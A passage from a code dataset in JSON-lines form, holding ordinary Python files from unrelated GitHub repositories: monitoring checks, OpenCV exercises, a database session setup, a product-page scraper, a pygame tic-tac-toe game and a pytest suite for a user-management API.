{IpInt.location.node.name} port {IpInt.location.port.name} is {IpInt.state}\")\n short = f\"Checked {count} Interfaces\"\n\n (code, message) = check.check_messages(separator=\"\\n\")\n check.exit(code=code,message=f\"{short}\\n{message}\")\n\nif __name__ == \"__main__\":\n run()","repo_name":"ConSol-Monitoring/check_ontap","sub_path":"checkontap/ontapcmd/clusterhealth.py","file_name":"clusterhealth.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28511650215","text":"import os\nimport numpy as np\nfrom aicsimageio import AICSImage, OmeTifWriter\n\nfrom brightfield2fish.data.preprocess_images import normalize\n\n\ndef test_normalize():\n fpath = os.path.join(\"tmp_tests\", \"foo.ome.tiff\")\n arr = np.random.randint(\n low=0, high=2 ** 16 - 1, size=(1, 2, 3, 4, 5), dtype=np.uint16\n )\n writer = OmeTifWriter(fpath, overwrite_file=True)\n writer.save(arr)\n im = AICSImage(fpath)\n\n for channel in (0, 1):\n _ = normalize(im, channel=channel)\n","repo_name":"AllenCellModeling/brightfield2fish","sub_path":"brightfield2fish/tests/test_preprocess_images.py","file_name":"test_preprocess_images.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2359230913","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread(\"BMW.jpg\")\nimg2 = cv2.imread(\"BMW X5.jpg\")\ncv2.namedWindow('img', cv2.WINDOW_AUTOSIZE)\ncv2.imshow(\"img\", img)\ncv2.imshow(\"img2\", img2)\ncv2.waitKey(0)\n\n\n# cv2.destroyAllWindows(\"img\")\n# cv2.destroyAllWindows(\"img2\")\n\n\ndef image_shape():\n img = cv2.imread('BNW.jpg')\n print(\"The size of the image is \", img.shape)\n\n\ndef create_black_image():\n black_image = np.zeros((300, 300), np.uint8)\n return black_image\n\n\ndef create_white_image():\n white_image = np.ones((300, 300), np.uint8) * 255\n return white_image\n\n\ndef load_display(image):\n cv2.namedWindow(\"Test\", cv2.WINDOW_AUTOSIZE)\n cv2.imshow(\"Test\", image)\n cv2.waitKey(0)\n # cv2.destroyWindow(\"Test\")\n\n\ndef sliceimage():\n sliceBMW = cv2.imread('BMW X5.jpg')\n load_display(sliceBMW)\n bmw_shape = sliceBMW.shape\n print(bmw_shape)\n half = bmw_shape[1] // 2\n print(half)\n front = sliceBMW[0:543, 0:407]\n load_display(front)\n\n\nif __name__ == \"__main__\":\n # white_image = create_white_image()\n # load_display(white_image)\n\n # black_image = create_black_image()\n # load_display(black_image)\n sliceimage()\n","repo_name":"tadeniyiipadeola/Digit-image-processing-","sub_path":"Basics/Lesson1.py","file_name":"Lesson1.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37860503157","text":"class Solution:\n def countMatches(self, items: List[List[str]], ruleKey: str, ruleValue: str) -> int:\n if(ruleKey=='type'):\n x=0\n elif(ruleKey=='color'):\n x=1\n else:\n x=2\n count=0\n for i in range(len(items)):\n if(items[i][x]==ruleValue):\n count+=1\n return count\n \n \n ","repo_name":"AmitIITP23/LeetCode","sub_path":"count-items-matching-a-rule/count-items-matching-a-rule.py","file_name":"count-items-matching-a-rule.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42883857534","text":"from typing import Callable, Union, Optional, TYPE_CHECKING\n\nfrom apscheduler.triggers.cron import CronTrigger\n\nfrom .apps import JOBS\n\n\ndef cron(crontab, job_id=None):\n \"\"\"\n Wrap a regular function, Celery task, or Dramatiq actor in a cron schedule.\n \"\"\"\n trigger = CronTrigger.from_crontab(crontab)\n\n def decorator(f):\n \"\"\"Create a scheduled trigger for the decorated callable\"\"\"\n\n # We might be getting called as a wrapper of a regular callable (function, class, etc)\n # Or we might be getting called as a wrapper of a Dramatiq or Celery task.\n # We'll start out just adding the callable to the JOBS list, but for example Dramatiq\n # actors should be invoked as \".send()\", and Celery tasks should be invoked as\n # \".apply_async()\".\n\n if hasattr(f, \"send\"):\n # It's (probably) a Dramatiq Actor\n func_call = f.send\n job_name = job_id or f\"{f.fn.__module__}.{f.fn.__name__}\"\n elif hasattr(f, \"apply_async\"):\n # It's a Celery task or shared_task\n func_call = f.apply_async\n job_name = job_id or f\"{f.name}\"\n else:\n # It's something else, probably just a regular callable - call it directly and use repr() as the name\n func_call = f\n job_name = job_id or f\"{f.__module__}.{f.__name__}\"\n JOBS.append((trigger, func_call, job_name))\n return f\n\n return decorator\n","repo_name":"LucidDan/django-cadence","sub_path":"django_cadence/scheduling.py","file_name":"scheduling.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71229920168","text":"price = [12.5,12,30]\nprint(\"Pretul este : {}\".format(price))\nproduct = {\n 'nume':\"tv\",\n 'price': 1200\n }\nprint(product.items())\n\nclass Person:\n def __init__(self,name,age):\n self.name = name\n self.age = age\n def __str__(self):\n return self.name + '' + self.name","repo_name":"lauracarpaciu/Algorithmic_Thinking","sub_path":"Siruri de caractere/Reprezentarea obiectelor ca text.py","file_name":"Reprezentarea obiectelor ca text.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22307410052","text":"from __future__ import annotations\n\nimport logging\nimport os\nfrom contextlib import aclosing, asynccontextmanager\nfrom typing import AsyncContextManager, Optional\n\nimport orjson\nfrom sqlalchemy.engine import Engine\nfrom sqlalchemy.ext.asyncio import AsyncSession, create_async_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nfrom Shared.functions.readSettingsFile import get_setting\n\nPOSTGRES_USER = os.environ.get(\"POSTGRES_USER\")\nassert POSTGRES_USER\nPOSTGRES_PASSWORD = os.environ.get(\"POSTGRES_PASSWORD\")\nassert POSTGRES_PASSWORD\nPOSTGRES_HOST = os.environ.get(\"POSTGRES_HOST\")\nassert POSTGRES_HOST\nPOSTGRES_PORT = os.environ.get(\"POSTGRES_PORT\")\nassert POSTGRES_PORT\nPOSTGRES_DB = os.environ.get(\"POSTGRES_DB\")\nassert POSTGRES_DB\n\n\nDATABASE_URL = (\n f\"\"\"postgresql+asyncpg://{POSTGRES_USER}:{POSTGRES_PASSWORD}@{POSTGRES_HOST}:{POSTGRES_PORT}/{POSTGRES_DB}\"\"\"\n)\n_ENGINE = None\n_SESSIONMAKER = None\n_TEST_MODE = False\n\n\ndef update_from_class(self, other_class: Base):\n if id(self) != id(other_class):\n for key, value in other_class.__dict__.items():\n if not key.startswith(\"_\"):\n setattr(self, key, value)\n\n\nBase = declarative_base()\nBase.update_from_class = update_from_class\n\n\ndef setup_engine(database_url: str = DATABASE_URL) -> Engine:\n global _ENGINE\n\n if not _ENGINE:\n _ENGINE = create_async_engine(\n database_url,\n future=True,\n echo=bool(get_setting(\"ENABLE_DEBUG_MODE\") and not is_test_mode()),\n echo_pool=bool(get_setting(\"ENABLE_DEBUG_MODE\") and not is_test_mode()),\n json_deserializer=orjson.loads,\n json_serializer=lambda x: orjson.dumps(x).decode(),\n pool_pre_ping=True,\n pool_size=50,\n max_overflow=125,\n pool_timeout=300,\n )\n\n return _ENGINE\n\n\ndef get_async_sessionmaker() -> sessionmaker:\n global _SESSIONMAKER\n\n # if expire_on_commit is enabled, our own cache would get expired after every session close\n # since we are careful and update the cache when we change an object, that should not be a problem\n if not _SESSIONMAKER:\n _SESSIONMAKER = sessionmaker(bind=setup_engine(), class_=AsyncSession, future=True, expire_on_commit=False)\n return _SESSIONMAKER\n\n\ndef is_test_mode(set_test_mode: Optional[bool] = None) -> bool:\n global _TEST_MODE\n\n if set_test_mode is not None:\n _TEST_MODE = set_test_mode\n\n return _TEST_MODE\n\n\n@asynccontextmanager\nasync def acquire_db_session() -> AsyncContextManager[AsyncSession]:\n \"\"\"Get a database session\"\"\"\n db = get_async_sessionmaker()()\n logger = logging.getLogger(\"db\")\n\n if not db.in_transaction():\n async with db.begin():\n yield db\n else:\n logger.debug(\"Already in transaction\")\n yield db\n if db.in_transaction():\n await db.commit()\n logger.debug(\"Implicit transaction commit\")\n","repo_name":"TheDescend/elevatorbot","sub_path":"Backend/database/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"36240375344","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 19 15:04:08 2018\n@author: ravila\n\"\"\"\n\nfrom Bio import SeqIO\nimport glob\nimport pandas as pd\nfrom multiprocessing import Pool\nimport numpy as np\nimport sys\n\n\ndef get_reading_frame(seq, n):\n \"\"\"Takes a sequence string and an integer shift\n retruns a list of triplets shifted by the given ammount.\"\"\"\n frame = []\n for f in (seq[i:i+3] for i in range(n, len(seq), 3)):\n if len(f) % 3 == 0:\n frame.append(f)\n return frame\n\n\ndef vectorize(r):\n fasta = SeqIO.read(r, 'fasta')\n sequence = str(fasta.seq)\n # Get reading frames\n rf1 = get_reading_frame(sequence, 0)\n rf2 = get_reading_frame(sequence, 1)\n rf3 = get_reading_frame(sequence, 2)\n # Get the sum of vectors for all the triplets.\n vec = np.zeros(100)\n for l in [rf1, rf2, rf3]:\n for t in l:\n component = np.array(model.loc[model[0] == t])[0][1:]\n vec = np.add(vec, component)\n name = r.split(\"/\")[-1].rstrip(\".txt\")\n return [name] + [i for i in vec]\n\n\nif __name__ == \"__main__\":\n # Import pre-trained model\n model = pd.read_csv(\"protVec_100d_3grams.csv\", header=None)\n # List to store results\n vecs = []\n # Read receptor data\n dir_name = sys.argv[1].rstrip(\"/\")\n receptors = glob.glob(dir_name + \"/*.txt\")\n # Start process pool\n pool = Pool(processes=4)\n vecs.append(pool.map(vectorize, receptors))\n vecs = vecs[0]\n vecs_df = pd.DataFrame(vecs)\n vecs_df.to_csv(dir_name + \"_vec.csv\", index=False)\n","repo_name":"ravila4/DTIpred","sub_path":"src/features/prot2vec.py","file_name":"prot2vec.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16593486898","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport os\r\nimport csv\r\n\r\n# http://www.useragentstring.com/ 의 내용 복사\r\nheaders = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36'}\r\n\r\nos.chdir(r'C:/pyml-master/coupang')\r\n\r\nbrandName = '헤라' #검색어(브랜드네임) 지정\r\npage = 3 #페이지수 지정\r\n\r\n\r\ndatalist=[]\r\nfor i in range(1,page+1):\r\n url = \"https://www.coupang.com/np/products/brand-shop?brandName=\"+brandName+\"&page=\"+str(i)\r\n resp = requests.get(url, headers = headers)\r\n soup = BeautifulSoup(resp.text, features='lxml')\r\n url2 = soup.find_all(\"a\", class_ = \"baby-product-link\")\r\n for j in range(0, len(url2)):\r\n a=url2[j].attrs['href']\r\n b=url2[j].find(\"div\", class_ =\"name\")\r\n c=url2[j].find(\"strong\", class_ =\"price-value\")\r\n name=b.get_text(\" \", strip=True)\r\n price=c.get_text(\" \", strip=True)\r\n url3= \"https://www.coupang.com\"+a\r\n data = []\r\n data.append(url3)\r\n data.append(name)\r\n data.append(price)\r\n datalist.append(data)\r\n s=(j+1)+60*(i-1)\r\n print(str(s)+\".\", \"[ \"+url3+\" ],\", \"[ \"+name+\" ],\", \"[ \"+price+\"원 ]\")\r\n resp2 = requests.get(url3, headers = headers)\r\n soup = resp2.text\r\n coup = re.findall('\"origin\":\".*?jpg\"}]', soup, flags=re.IGNORECASE)\r\n \r\n if len(coup) == 0:\r\n coup = re.findall('\"origin\":\".*?g\"}]', soup, flags=re.IGNORECASE)\r\n coup2 = \"\".join(coup[0])\r\n coup3 = re.findall('\"origin\":\".*?g\"', coup2, flags=re.IGNORECASE)\r\n for k in range(len(coup3)):\r\n img = coup3[k][10:-1]\r\n img2 = \"https:\"+img\r\n print(img2)\r\n r = requests.get(img2)\r\n file = open(\"{0:04}-\".format(s)+\"{0:04}.jpg\".format(k+1),\"wb\")\r\n file.write(r.content)\r\n file.close()\r\n else :\r\n coup2 = \"\".join(coup[0])\r\n coup3 = re.findall('\"origin\":\".*?g\"', coup2, flags=re.IGNORECASE)\r\n for k in range(len(coup3)):\r\n img = coup3[k][10:-1]\r\n img2 = \"https:\"+img\r\n print(img2)\r\n r = requests.get(img2)\r\n file = open(\"{0:04}-\".format(s)+\"{0:04}.jpg\".format(k+1),\"wb\")\r\n file.write(r.content)\r\n file.close()\r\n \r\nwith open(brandName+'.csv','w', newline='') as f: \r\n a = csv.writer(f) \r\n for value in datalist: \r\n a.writerow(value)\r\n","repo_name":"jslim7812/JHLEE","sub_path":"coupang.py","file_name":"coupang.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74465433449","text":"import pygame\nimport time\nimport random\nimport tictactoe_engine\nimport common_variables\nimport tictactoe_players\nfrom tictactoe_engine import *\nfrom common_variables import *\nfrom tictactoe_players import *\nfrom pygame.locals import *\n\n# set board for play\ndef play():\n global DISPLAY, board\n engine = Engine()\n buttons = Buttons()\n mouse_x = 0\n mouse_y = 0\n board = [' ' for i in range (9)]\n new_board = False\n click = False\n wait_loop = 180\n win = []\n start = True\n blink = [i for i in range(200)]\n round_end = False\n count_board = 1\n switch = True\n quit = False\n pygame.init()\n DISPLAY = pygame.display.set_mode((W_WIDTH, W_HEIGHT))\n pygame.display.set_caption('tictactoe')\n clock = pygame.time.Clock()\n wall_image = pygame.image.load(engine.select_image())\n pygame.mixer.music.load('music/music.ogg')\n pygame.mixer.music.play(-1)\n \n while True:\n if start == True and wait_loop == 180:\n DISPLAY.blit(wall_image, (0, 0))\n buttons.draw_title(DISPLAY)\n squareI, squareII, squareIII, squareIV = buttons.draw_headers(DISPLAY)\n \n elif round_end == True and new_board == False and wait_loop < 180: \n DISPLAY.blit(wall_image, (0, 0)) \n buttons.draw_winner(playerI, playerII, DISPLAY)\n if wait_loop == 179:\n wall_image = pygame.image.load(engine.select_image())\n round_end = False \n\n elif start == False:\n DISPLAY.blit(wall_image, (0, 0))\n pygame.draw.aaline(DISPLAY, CHALK, (MARGIN_X + W_SPACE, MARGIN_Y), \n (MARGIN_X + W_SPACE, W_HEIGHT - MARGIN_Y), 4)\n pygame.draw.aaline(DISPLAY, CHALK, (MARGIN_X + (2 * W_SPACE), MARGIN_Y), \n (W_WIDTH - MARGIN_X - W_SPACE, W_HEIGHT - MARGIN_Y), 4)\n pygame.draw.aaline(DISPLAY, CHALK, (MARGIN_X, MARGIN_Y + W_SPACE), \n (W_WIDTH - MARGIN_X, MARGIN_Y + W_SPACE), 4)\n pygame.draw.aaline(DISPLAY, CHALK, (MARGIN_X, W_HEIGHT - MARGIN_Y - W_SPACE), \n (W_WIDTH - MARGIN_X, W_HEIGHT - MARGIN_Y - W_SPACE), 4) \n \n for count, value in enumerate(board):\n point_X = engine.convert_to_X(count)\n point_Y = engine.convert_to_Y(count)\n if value == 'X' and count not in win:\n pygame.draw.line(DISPLAY, BROWN, \n ((point_X * W_SPACE) + GAP + MARGIN_X,\n (point_Y * W_SPACE) + GAP + MARGIN_Y),\n ((point_X * W_SPACE) + W_SPACE - GAP + MARGIN_X,\n (point_Y * W_SPACE) + W_SPACE - GAP + MARGIN_Y),\n 7)\n pygame.draw.line(DISPLAY, BROWN,\n ((point_X * W_SPACE) + W_SPACE - GAP + MARGIN_X,\n (point_Y * W_SPACE) + GAP + MARGIN_Y),\n ((point_X * W_SPACE) + GAP + MARGIN_X,\n (point_Y * W_SPACE) + W_SPACE - GAP + MARGIN_Y),\n 7)\n \n elif value == 'O' and count not in win:\n pygame.draw.circle(DISPLAY, BROWN,\n ((point_X * W_SPACE) + HALF + MARGIN_X,\n (point_Y * W_SPACE) + HALF + MARGIN_Y), \n HALF - GAP, \n 7)\n \n if (value == 'X' and count in win \n and (wait_loop in blink[0:20] \n or wait_loop in blink[40:60] \n or wait_loop in blink[80:100] \n or wait_loop in blink[120:140]\n or wait_loop in blink[160:180])):\n pygame.draw.line(DISPLAY, BROWN, \n ((point_X * W_SPACE) + GAP + MARGIN_X,\n (point_Y * W_SPACE) + GAP + MARGIN_Y),\n ((point_X * W_SPACE) + W_SPACE - GAP + MARGIN_X,\n (point_Y * W_SPACE) + W_SPACE - GAP + MARGIN_Y),\n 7)\n pygame.draw.line(DISPLAY, BROWN,\n ((point_X * W_SPACE) + W_SPACE - GAP + MARGIN_X,\n (point_Y * W_SPACE) + GAP + MARGIN_Y),\n ((point_X * W_SPACE) + GAP + MARGIN_X,\n (point_Y * W_SPACE) + W_SPACE - GAP + MARGIN_Y),\n 7)\n \n elif (value == 'O' and count in win\n and (wait_loop in blink[0:20] \n or wait_loop in blink[40:60] \n or wait_loop in blink[80:100] \n or wait_loop in blink[120:140]\n or wait_loop in blink[160:180])):\n pygame.draw.circle(DISPLAY, BROWN,\n ((point_X * W_SPACE) + HALF + MARGIN_X,\n (point_Y * W_SPACE) + HALF + MARGIN_Y), \n HALF - GAP, \n 7) \n \n for event in pygame.event.get():\n if event.type == QUIT or quit:\n pygame.quit()\n elif event.type == MOUSEMOTION:\n mouse_x, mouse_y = event.pos\n elif event.type == MOUSEBUTTONUP:\n mouse_x, mouse_y = event.pos\n click = True\n \n # this variable prevents to display players move in the same time\n if wait_loop < 180:\n wait_loop += 1\n # create new board \n if new_board == True and wait_loop == 180:\n count_board += 1\n board = [' ' for i in range(9)]\n new_board = False\n wait_loop = 0\n if count_board > 10:\n count_board = 0\n round_end = True\n start = True\n wait_loop = 0\n else:\n time.sleep(1)\n \n # check if sound button pressed\n sound = buttons.draw_sound_icon(switch, DISPLAY)\n if sound.collidepoint(mouse_x, mouse_y):\n if buttons.sizeIV <= 20:\n buttons.sizeIV += 1\n elif buttons.sizeIV <= 21 and buttons.sizeIV >= 18:\n buttons.sizeIV -= 1\n if sound.collidepoint(mouse_x, mouse_y) and click == True:\n if switch == True:\n switch = False\n else:\n switch = True\n engine.music(switch)\n click = False \n \n if start == True :\n # draw bigger text if cursor on it\n # if cursor not on it come back to orginal size\n if squareI.collidepoint(mouse_x, mouse_y):\n if buttons.sizeI < 55:\n buttons.sizeI += 1\n else:\n if buttons.sizeI > 40:\n buttons.sizeI -= 1\n if squareII.collidepoint(mouse_x, mouse_y):\n if buttons.sizeII < 55:\n buttons.sizeII += 1\n else:\n if buttons.sizeII > 40:\n buttons.sizeII -= 1\n if squareIII.collidepoint(mouse_x, mouse_y):\n if buttons.sizeIII < 55:\n buttons.sizeIII += 1\n else:\n if buttons.sizeIII > 40:\n buttons.sizeIII -= 1\n if squareIV.collidepoint(mouse_x, mouse_y):\n if buttons.sizeVI < 55:\n buttons.sizeVI += 1\n else:\n if buttons.sizeVI > 40:\n buttons.sizeVI -= 1\n \n if squareI.collidepoint(mouse_x, mouse_y) and click == True:\n playerI = Player('X', True)\n playerII = Player('O', 'easy')\n start = False\n click = False\n current_player = playerI\n elif squareII.collidepoint(mouse_x, mouse_y) and click == True:\n playerI = Player('X', True)\n playerII = Player('O', 'normal')\n start = False\n click = False\n current_player = playerI\n elif squareIII.collidepoint(mouse_x, mouse_y) and click == True:\n playerI = Player('X', True)\n playerII = Player('O', 'hard')\n start = False\n click = False\n current_player = playerI\n elif squareIV.collidepoint(mouse_x, mouse_y) and click == True:\n quit = True \n \n elif start == False:\n square_X, square_Y, index = engine.transform_pixel(mouse_x, mouse_y, board)\n if square_X != None and square_Y != None :\n buttons.highlight(square_X, square_Y, DISPLAY)\n # human player move \n if (click == True \n and square_X != None \n and square_Y != None \n and current_player.kind == True\n and new_board == False):\n engine.update_board(board, index, current_player.symbol)\n current_player = playerII\n click = False\n wait_loop = 0\n win = engine.check_winner(board, playerI.symbol)\n if win != []:\n playerI.score += 1\n new_board = True\n wait_loop = 0\n elif ' ' not in board:\n new_board = True\n wait_loop = 0\n # artificial player move \n elif (current_player.kind != True \n and wait_loop == 2\n and new_board == False):\n choice = current_player.artificial_move(board, engine)\n engine.update_board(board, choice, current_player.symbol)\n current_player = playerI\n win = engine.check_winner(board, playerII.symbol)\n if win != []:\n playerII.score += 1\n new_board = True\n wait_loop = 0\n elif ' ' not in board:\n new_board = True\n wait_loop = 0\n else:\n time.sleep(1)\n\n buttons.draw_score_icon(playerI, playerII, count_board, DISPLAY)\n exit = buttons.draw_exit_icon(DISPLAY)\n if exit.collidepoint(mouse_x, mouse_y):\n if buttons.sizeV<= 20:\n buttons.sizeV += 1\n if click == True:\n new_board = True\n wait_loop = 180\n count_board = 11\n click = False\n elif buttons.sizeV <= 21 and buttons.sizeV >= 18:\n buttons.sizeV -= 1\n \n pygame.display.update()\n clock.tick(FPS) \n \nplay()\n\n \n","repo_name":"Greenpaul11/Python_Projects","sub_path":"TICTACTOE_PYGAME/tictactoe_pygame/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":11341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5840967789","text":"import os\nimport json\nimport random\nimport allure\nfrom helpers.idslist import get_id_user_list\nimport pytest\nfrom assertpy.assertpy import assert_that\nfrom cerberus import Validator\nfrom dotenv import load_dotenv\n\n\nfrom crud_users import CrudUser\nfrom helpers.login import Login\nfrom helpers.name_generator import User_Data\n\nload_dotenv()\nID = os.getenv('ID_USER')\nURL = os.getenv('BASE_URL')\nTOKEN = os.getenv('ACCESS_TOKEN')\nUSER = os.getenv('USER')\nPASSWORD = os.getenv('PASSWORD')\n\n\n@pytest.fixture(scope=\"function\")\n@allure.step('Get the users')\ndef preconditions():\n file = open('./testdata/get_user/get_user.json', \"r\")\n input_data = json.loads(file.read())\n result = get_id_user_list(input_data)\n return result\n\n\n@pytest.mark.sanity\n@pytest.mark.regression\n@pytest.mark.black_box\n@pytest.mark.acceptance\n@allure.severity(allure.severity_level.CRITICAL)\n@allure.description(\"Verify if response is 200 when is updated the users successfully\")\ndef test_update_user_success(preconditions):\n User_Data().aleatory_email('update_user/update_user.json')\n User_Data().aleatory_name('update_user/update_user.json')\n User_Data().aleatory_first_name('update_user/update_user.json')\n User_Data().aleatory_last_name('update_user/update_user.json')\n User_Data().aleatory_roles('update_user/update_user.json')\n file = open('./testdata/update_user/update_user.json', \"r\")\n input_data = json.loads(file.read())\n crud_users = CrudUser()\n data = preconditions\n id_users = random.choice(data)\n response = crud_users.update_user(URL, TOKEN, input_data, id_users)\n assert_that(response.status_code).is_equal_to(200)\n data = json.loads(response.text)\n assert_that(data[\"email\"]).contains(input_data['email'])\n assert_that(data[\"name\"]).contains(input_data['name'])\n assert_that(data[\"first_name\"]).contains(input_data['first_name'])\n assert_that(data[\"last_name\"]).contains(input_data['last_name'])\n assert_that(data[\"roles\"][0]).contains(input_data['roles'])\n\n\n@pytest.mark.sanity\n@pytest.mark.regression\n@pytest.mark.acceptance\n@allure.severity(allure.severity_level.CRITICAL)\n@allure.description(\"Verify schema of users update is correct\")\ndef test_update_schema_users(preconditions):\n Login().login(USER, PASSWORD)\n User_Data().aleatory_email('update_user/update_user.json')\n User_Data().aleatory_name('update_user/update_user.json')\n User_Data().aleatory_first_name('update_user/update_user.json')\n User_Data().aleatory_last_name('update_user/update_user.json')\n User_Data().aleatory_roles('update_user/update_user.json')\n file = open('./testdata/update_user/update_user.json', \"r\")\n schema = open('./testdata/update_user/schema.json', \"r\")\n input_data = json.loads(file.read())\n output_data = json.loads(schema.read())\n crud_user = CrudUser()\n data = preconditions\n id_users = random.choice(data)\n response = crud_user.update_user(URL, TOKEN, input_data, id_users)\n # Error response\n assert_that(response.status_code).is_equal_to(200)\n validator = Validator(output_data, require_all=False)\n print(validator)\n is_valid = validator.validate(response.as_dict)\n assert_that(is_valid, description=validator.errors).is_true()\n\n\n@pytest.mark.black_box\n@pytest.mark.negative\n@pytest.mark.security\n@pytest.mark.regression\n@allure.severity(allure.severity_level.MINOR)\n@allure.description(\"Verify the response is 401 when is added with an invalid authorization token\")\ndef test_update_users_invalid_token(preconditions):\n Login().login(USER, PASSWORD)\n file = open('./testdata/update_user/update_user.json', \"r\")\n input_data = json.loads(file.read())\n crud_user = CrudUser()\n data = preconditions\n id_users = random.choice(data)\n response = crud_user.update_user(URL, \"TOKEN\", input_data, id_users)\n # Verify the response is 401 when is added with an invalid authorization token\n assert_that(response.status_code).is_equal_to(401)\n\n\n@pytest.mark.black_box\n@pytest.mark.negative\n@pytest.mark.regression\n@allure.severity(allure.severity_level.MINOR)\n@allure.description(\"Validate the response is 404 when is added with a invalid id\")\ndef test_update_users_invalid_id():\n Login().login(USER, PASSWORD)\n invalid_id = 1000\n file = open('./testdata/update_user/update_user.json', \"r\")\n input_data = json.loads(file.read())\n crud_user = CrudUser()\n response = crud_user.update_user(URL, TOKEN, input_data, invalid_id)\n # Validate the response is 404 when is added with a invalid id\n assert_that(response.status_code).is_equal_to(404)\n\n\n@pytest.mark.black_box\n@pytest.mark.negative\n@allure.severity(allure.severity_level.MINOR)\n@allure.description(\"Verify if the email is invalid when send the incorrect information\")\ndef test_update_users_invalid_email(preconditions):\n Login().login(USER, PASSWORD)\n User_Data().aleatory_name('update_user/invalid_email.json')\n User_Data().aleatory_first_name('update_user/invalid_email.json')\n User_Data().aleatory_last_name('update_user/invalid_email.json')\n User_Data().aleatory_roles('update_user/invalid_email.json')\n file = open('./testdata/update_user/invalid_email.json', \"r\")\n input_data = json.loads(file.read())\n crud_user = CrudUser()\n data = preconditions\n id_users = random.choice(data)\n response = crud_user.update_user(URL, TOKEN, input_data, id_users)\n # Verify when author email is filled with invalid param display a response 400\n assert_that(response.status_code).is_equal_to(400)\n\n\n@pytest.mark.black_box\n@pytest.mark.negative\n@pytest.mark.regression\n@allure.severity(allure.severity_level.NORMAL)\n@allure.description(\"Verify if the data is empty when send the missing information\")\ndef test_update_users_empty_data(preconditions):\n Login().login(USER, PASSWORD)\n User_Data().aleatory_email('update_user/empty.json')\n file = open('./testdata/update_user/empty.json', \"r\")\n input_data = json.loads(file.read())\n crud_user = CrudUser()\n data = preconditions\n id_users = random.choice(data)\n response = crud_user.update_user(URL, TOKEN, input_data, id_users)\n # Successfully response\n assert_that(response.status_code).is_equal_to(400)\n","repo_name":"ApiTesting-AT16/ApicitosFramework","sub_path":"tests/test_update_user.py","file_name":"test_update_user.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31847607987","text":"__author__ = 'chenliang'\n\nimport os\n\nfor root, dirs, files in os.walk(\"/Users/chenliang/git_projects/connect/connect/Resources/icons\"):\n for name in dirs:\n # os.rmdir()\n k = os.path.join(root, name)\n count = len(os.listdir(os.path.join(root, name)))\n if count <= 0:\n os.rmdir(k)\n","repo_name":"angelleecash/python","sub_path":"rm_empty_dir.py","file_name":"rm_empty_dir.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12088907056","text":"import csv\nfrom collections import defaultdict\n\n\ndef ctree():\n\n return defaultdict(ctree)\n\n\ndef build_leaf(name, leaf):\n \n res = {\"name\": name}\n\n # add children node if the leaf actually has any children\n if len(leaf.keys()) > 0:\n res[\"children\"] = [build_leaf(k, v) for k, v in leaf.items()]\n\n return res\n\n\ndef main():\n \n tree = ctree()\n # NOTE: you need to have test.csv file as neighbor to this file\n with open('Student_Behaviour.csv') as csvfile:\n reader = csv.reader(csvfile)\n for rid, row in enumerate(reader):\n\n # skipping first header row. remove this logic if your csv is\n # headerless\n if rid == 0:\n continue\n\n # usage of python magic to construct dynamic tree structure and\n # basically grouping csv values under their parents\n leaf = tree[row[0]]\n for cid in range(1, len(row)):\n leaf = leaf[row[cid]]\n\n # building a custom tree structure\n res = []\n for name, leaf in tree.items():\n res.append(build_leaf(name, leaf))\n\n # printing results into the terminal\n import json\n print(json.dumps(res))\n\n\n# so let's roll\nmain()","repo_name":"TornadoTebbe/Elm-Visualisation","sub_path":"Daten/pytojson.py","file_name":"pytojson.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21663682292","text":"\"\"\"\nThis script provides an example of how to call model_trainer.py\n\"\"\"\n\nfrom importlib import reload\n\nimport math\nimport torch\nimport torch.distributions as distribs\nimport numpy as np\n\nimport src.model_trainer\nreload(src.model_trainer)\nfrom src.model_trainer import ex # importing experiment here is crucial (why?)\n\nfrom sacred.observers import FileStorageObserver, RunObserver\n\nimport os\n\n# don't record information in the file system, just investigate where the program fails\ndebug_mode = False\n\n\n# this is a custom distribution that I use for some the experiments with block orthogonal initialization\nclass MyDistrib(distribs.distribution.Distribution):\n\n def __init__(self, angle: float, variance: float):\n\n super(MyDistrib, self).__init__()\n\n self.bern = distribs.bernoulli.Bernoulli(torch.tensor([0.5]))\n self.normal = distribs.normal.Normal(torch.zeros((1)), torch.tensor([variance]))\n\n self.angle = angle\n\n def sample(self):\n\n result = self.angle*(2.0*self.bern.sample() - 1.0)\n result += self.normal.sample()\n return result\n\n\n# custom configuration\n# it should be noted that when architecture is REGRESSION\n# 